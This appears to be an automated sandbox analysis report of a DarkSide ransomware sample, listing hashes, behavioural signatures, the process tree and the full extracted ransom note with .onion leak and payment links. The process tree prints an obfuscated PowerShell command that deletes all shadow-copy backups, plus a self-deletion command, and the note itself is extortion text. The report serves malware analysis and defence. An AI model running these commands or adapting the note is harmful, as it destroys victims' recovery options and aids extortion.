Analysis

  • max time kernel
    116s
  • max time network
    130s
  • platform
    windows7_x64
  • resource
    win7-20230220-en
  • resource tags

    arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
  • submitted
    02-06-2023 20:15

General

  • Target

    Darkside.exe

  • Size

    59KB

  • MD5

    cfcfb68901ffe513e9f0d76b17d02f96

  • SHA1

    766b30e5a37d1bc8d8fe5c7cacc314504a44ac1f

  • SHA256

    17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61

  • SHA512

    0d26fa9478f4626107e38c570d1bae1049b744181cf0395d95fb07675575ca393d88d4783bf31bdf11bef1da5648a5a53a6d95b21492f96b4de35c0ec323ae0c

  • SSDEEP

    768:9jjV7Iax7F3DS4/S96/P3rsAc4ci5pwwX5+R4VYY23W5:vx7Fu4/i6/P3rlckx5+R4VDZ5

Malware Config

Extracted

Path

C:\Users\Admin\README.6a2c0f68.TXT

Family

darkside

Ransom Note
----------- [ Welcome to DarkSide ] -------------> What happend? ---------------------------------------------- Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. Follow our instructions below and you will recover all your data. Data leak ---------------------------------------------- First of all we have uploaded more then 90 GB data. These files include: Finance data Insurance data Buchgalting Data Banking data and details, bank contracts, creditors info Much personal data Marketing data Production, Technik data Email conversations dump and more others. All documents are fresh (last 365 days) and stored on our offline servers. All data will be published piece by piece. First data pack will be published in 7 days if we do not come for agreement. Your personal leak page: http://darksidedxcftmqa.onion/polifilm/AWeu5Sv7zTTCTjZD8YkgoPRznfE5r7G-vbsXok9EvfiaNL_eDwRlgRMruMHisnEF On the page you will find examples of files that have been stolen. The data is preloaded and will be automatically published if you do not pay. After publication, your data will be available for at least 6 months on our tor cdn servers. We are ready: - To provide you the evidence of stolen data - To delete all the stolen data. What guarantees? ---------------------------------------------- We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. We guarantee to decrypt one file for free. Go to the site and contact us. How to get access on website? ---------------------------------------------- Using a TOR browser: 1) Download and install TOR browser from this site: https://torproject.org/ 2) Open our website: http://darksidfqzcuhtk2.onion/2AHUVJ3VGS97NUG5J5EYMQM5PJO77V9V0GDT3UYIJGFZUTOQRLUX593CQ2EZ2ZEH When you open our website, put the following data in the input form: Key: rIzr2nCuqbQL7MGMwoppaucqSp5AZufUiYhssYa1SGfO0XFf09fBDlLDWgKQSnnvIAfqYTsOgUhOTxzbxGsC9nH0yk2HOFhn7t8ntX8L0evyce8vKdgUKF7Xvjn6ljaQQ4HPEfPZFP2jvN0DgBVWl2WgNT1U3owZ1bNBjps34t33ObZc01Ce1yKx5CSlwUYbw1ktjqt5d7R9DwRL3NIGrTHvMX3qXI5aBAUnirnc4zHtfGPXq4CuFoh04Tv7VE81aohfvuz8D7wo7i28sbILoJyF6mzeQwSkAXolOhXKQAEPsGcdbfLxfY5uILkHB3d1gAyxT1owQXsY4heNQbY3yYL1Em7dDaLdbNhOf0adYWFiFfAl9EwLDRT96L9Xzsk17ho1B82wOWZ79ZqtT8yqnZ4APJb1LO91ASSsgUdNvR0lAaZTfXHHxUI1vDm5ygyV7cbxMlrQ5K1U6ughdd5WosogMJWVNjreirhzuDzY6SnixtukGYG0D9azzgOHcgidJcLV4n0orhzIaA1SMNYOpdOIadgBehCaHwEyr3hn8CEa6fgpUgK6E95 !!! DANGER !!! DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. !!! DANGER !!!
URLs

http://darksidedxcftmqa.onion/polifilm/AWeu5Sv7zTTCTjZD8YkgoPRznfE5r7G-vbsXok9EvfiaNL_eDwRlgRMruMHisnEF

http://darksidfqzcuhtk2.onion/2AHUVJ3VGS97NUG5J5EYMQM5PJO77V9V0GDT3UYIJGFZUTOQRLUX593CQ2EZ2ZEH

Signatures

  • DarkSide

    Targeted ransomware first seen in August 2020. Operators steal data to use as leverage.

  • Renames multiple (183) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

  • Modifies extensions of user files 13 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Deletes itself 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Drops desktop.ini file(s) 2 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies Control Panel 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 25 IoCs
  • Modifies registry class 14 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 28 IoCs
  • Suspicious use of FindShellTrayWindow 5 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\Darkside.exe
    "C:\Users\Admin\AppData\Local\Temp\Darkside.exe"
    1⤵
    • Modifies extensions of user files
    • Sets desktop wallpaper using registry
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Modifies Control Panel
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1560
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1524
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /C DEL /F /Q C:\Users\Admin\AppData\Local\Temp\Darkside.exe >> NUL
      2⤵
      • Deletes itself
      PID:2116
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:1372
  • C:\Program Files\Microsoft Games\minesweeper\minesweeper.exe
    "C:\Program Files\Microsoft Games\minesweeper\minesweeper.exe"
    1⤵
    • Drops desktop.ini file(s)
    • Modifies registry class
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of FindShellTrayWindow
    PID:1996
  • C:\Windows\system32\AUDIODG.EXE
    C:\Windows\system32\AUDIODG.EXE 0x458
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:972
  • C:\Windows\system32\rundll32.exe
    "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\Desktop\WaitTrace.vssx
    1⤵
    • Modifies registry class
    PID:2080
  • C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\Desktop\WaitStep.mht
    1⤵
    • Modifies Internet Explorer settings
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2160
    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2160 CREDAT:275457 /prefetch:2
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of SetWindowsHookEx
      PID:2220

Network

MITRE ATT&CK Matrix ATT&CK v6

Defense Evasion

Modify Registry

2
T1112

Credential Access

Credentials in Files

1
T1081

Discovery

System Information Discovery

1
T1082

Collection

Data from Local System

1
T1005

Impact

Defacement

1
T1491

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft Games\Minesweeper\MinesweeperSettings.xml
    Filesize

    11KB

    MD5

    691ebe3f06f86a389edffe869aacc696

    SHA1

    4097c7c80b984736f2aa09778cb23fffb9a10931

    SHA256

    2b8437be1bb0800cc7944ff92e4d3653bb673688473f173f2e8d2c077db38a0c

    SHA512

    11604e9bbe0c5ae5bf58cfcb96228ac8c7ab29f7d8342a769bf110fc80a630ef93f470e79f5beaec6d25a1584912b40fa6fcb5c973e0971a56ea346b29adfd81

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\GameExplorer\GameStatistics\{89FE5CB3-11CB-489C-AC0D-0C0B6707E1F6}\{89FE5CB3-11CB-489C-AC0D-0C0B6707E1F6}.gamestats
    Filesize

    3KB

    MD5

    d989d55ba606463e6a539ca0bd91fc08

    SHA1

    156197fb5df94b8afe08b53de09a5854cc687e81

    SHA256

    4b81636432d2b454bfd66d6032eb090f6c0b58c109049731b57c4f3d1e06bfc0

    SHA512

    ffa45e9c843c490155cc6e531e2373f5ee757737390044607ad9f7dbd3593b4f7c3f1ee41b0147dfacd17618789eb017996df0615a3f7160ba1e1bc6ec990517

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\GameExplorer\GameStatistics\{89FE5CB3-11CB-489C-AC0D-0C0B6707E1F6}\{89FE5CB3-11CB-489C-AC0D-0C0B6707E1F6}.gamestats
    Filesize

    3KB

    MD5

    40cf868237f73f6333b7e82f32da7a01

    SHA1

    d566e7048cb82c72736f4c7c8679c2e2f6a082aa

    SHA256

    d51d7e27a660e9606cc6d0c7c52bd98744178cff36791ffca6ccaa614071aa57

    SHA512

    63aae1ef90a485789ee96ff6f89447afb8e605ddf281c35c8cbf63081c9785136d36b6df0958c869c9f267008f2f7a0a0d1bf18cfdefe2e0b4e643be309dc009

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\GameExplorer\GameStatistics\{89FE5CB3-11CB-489C-AC0D-0C0B6707E1F6}\{89FE5CB3-11CB-489C-AC0D-0C0B6707E1F6}.gamestats
    Filesize

    3KB

    MD5

    11b1cb66abbbe81e007ddd2959f6b068

    SHA1

    f87a67ffe354b00cbb2f492701b6429762e9c87f

    SHA256

    cb5314886a9d885e9d9df33497476223bd30ead81d8cd8ddb7a977bf15675184

    SHA512

    efcba4aaddaea5e60c120811bf8e04664fea877b4fdf3559aac086a68ad679a8561d43b53a76ee6bef5d5ca8b4bd452a22082ed8a68a78ead7bde02b106230bb

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\GameExplorer\GameStatistics\{89FE5CB3-11CB-489C-AC0D-0C0B6707E1F6}\{89FE5CB3-11CB-489C-AC0D-0C0B6707E1F6}.gamestats
    Filesize

    3KB

    MD5

    11b1cb66abbbe81e007ddd2959f6b068

    SHA1

    f87a67ffe354b00cbb2f492701b6429762e9c87f

    SHA256

    cb5314886a9d885e9d9df33497476223bd30ead81d8cd8ddb7a977bf15675184

    SHA512

    efcba4aaddaea5e60c120811bf8e04664fea877b4fdf3559aac086a68ad679a8561d43b53a76ee6bef5d5ca8b4bd452a22082ed8a68a78ead7bde02b106230bb

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    Filesize

    7KB

    MD5

    e414cb852621a45ab56df9d6cc8b3570

    SHA1

    a4f6e54121b9a53501e0db0e46df2245d9572c1c

    SHA256

    1f14b82c3fc0f3c779b377245369d9ea52b4629ea64f1733d76fe7e848d530e1

    SHA512

    385a2619b62d4dbed7ddccca8c05d5c9677cbcc67d2eeb9528d3f0abe95c2f7661380e2f3f425756e3e2c7008a7b67f679637b83d34c11c824644d1f61845ade

  • C:\Users\Admin\README.6a2c0f68.TXT
    Filesize

    3KB

    MD5

    b58e2411168bbdbec635cf4001635db0

    SHA1

    c130cd9caaaa514a6b98c1168e10d44a989d191a

    SHA256

    652a74736e10402013fae584c967fc5ea3b7c2eac0a436d41759963b3d42e37a

    SHA512

    87e2c3ecf3805a7b3945eed4472548a63cbaee7c004c3bce220524e1c6733b3eb780812b4d336f6b72a365c161c02e18b8101e405d00507ff902e88dd49ba30a

  • C:\Users\Admin\Saved Games\Microsoft Games\desktop.ini
    Filesize

    83B

    MD5

    5ebf28b909ec9614ce70c28c01dce063

    SHA1

    34333279d521ad30421f32947cec3cacd361cdcb

    SHA256

    8c8c439af830f98d5c42a7fad1d3bc2ae510d97075b312b94c48cdc7ec6d5054

    SHA512

    55867d4701c232be95f282a7a3a6abf157145a3e0351d2337538ef63c9af19572df9f64ec9db94edf5b3cd591653d9effde192e260b64eb864d1aeb158946e90

  • memory/1524-62-0x0000000002520000-0x00000000025A0000-memory.dmp
    Filesize

    512KB

  • memory/1524-61-0x0000000002520000-0x00000000025A0000-memory.dmp
    Filesize

    512KB

  • memory/1524-59-0x000000001B490000-0x000000001B772000-memory.dmp
    Filesize

    2.9MB

  • memory/1524-60-0x0000000001DE0000-0x0000000001DE8000-memory.dmp
    Filesize

    32KB

  • memory/1996-315-0x0000000000260000-0x000000000026A000-memory.dmp
    Filesize

    40KB

  • memory/1996-79-0x0000000000380000-0x0000000000381000-memory.dmp
    Filesize

    4KB

  • memory/1996-314-0x0000000000260000-0x000000000026A000-memory.dmp
    Filesize

    40KB

  • memory/1996-76-0x0000000000260000-0x000000000026A000-memory.dmp
    Filesize

    40KB

  • memory/1996-316-0x0000000000380000-0x0000000000381000-memory.dmp
    Filesize

    4KB

  • memory/1996-326-0x0000000001E70000-0x0000000001E7A000-memory.dmp
    Filesize

    40KB

  • memory/1996-78-0x0000000000260000-0x000000000026A000-memory.dmp
    Filesize

    40KB

  • memory/1996-235-0x0000000001E70000-0x0000000001E7A000-memory.dmp
    Filesize

    40KB

  • memory/1996-77-0x0000000000260000-0x000000000026A000-memory.dmp
    Filesize

    40KB

  • memory/1996-354-0x0000000000260000-0x0000000000262000-memory.dmp
    Filesize

    8KB